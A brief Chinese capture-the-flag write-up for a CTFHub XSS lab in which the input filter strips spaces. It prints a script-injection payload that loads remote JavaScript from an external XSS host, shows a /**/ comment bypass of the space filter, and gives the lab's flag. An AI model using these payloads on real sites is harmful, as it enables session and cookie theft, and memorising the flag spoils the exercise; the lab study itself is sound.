CTFHUB技能树之XSS——过滤空格

开启靶场,打开链接:

看上去是GET传参,有点像反射型的那题


在第一个输入框中输入:

<sCRiPt sRC=//xs.pe/6b6></sCrIpT>

没什么反应,右键查看源代码:

发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理


用/**/绕过:

<sCRiPt/**/sRC=//xs.pe/6b6></sCrIpT>

提交之后再复制地址栏中的URL,粘贴到第二个输入框中提交:

成功得到flag:

ctfhub{5f10e129d697165a8083b5be}

相关推荐
摸鱼的春哥26 分钟前
惊!黑客靠AI把墨西哥政府打穿了,海量数据被黑
前端·javascript·后端
小兵张健29 分钟前
Playwright MCP 截图标注方案调研(推荐方案1)
前端·javascript·github
考虑考虑34 分钟前
JDK25模块导入声明
java·后端·java ee
小兵张健1 小时前
AI 页面与交互迁移流程参考
前端·ai编程·mcp
_小马快跑_2 小时前
Java 的 8 大基本数据类型:为何是不可或缺的设计?
java
小兵张健2 小时前
掘金发布 SOP(Codex + Playwright MCP + Edge)
前端·mcp
小兵张健2 小时前
Mac 上 Antigravity 无法调用 browser_subagent?一次 400 报错排查记录
前端
张拭心3 小时前
编程最强的模型,竟然变成了国产的它
前端·ai编程
爱勇宝3 小时前
2026一人公司生存指南:用AI大模型,90天跑出你的第一条现金流
前端·后端·架构
fe小陈3 小时前
简单高效的状态管理方案:Hox + ahooks
前端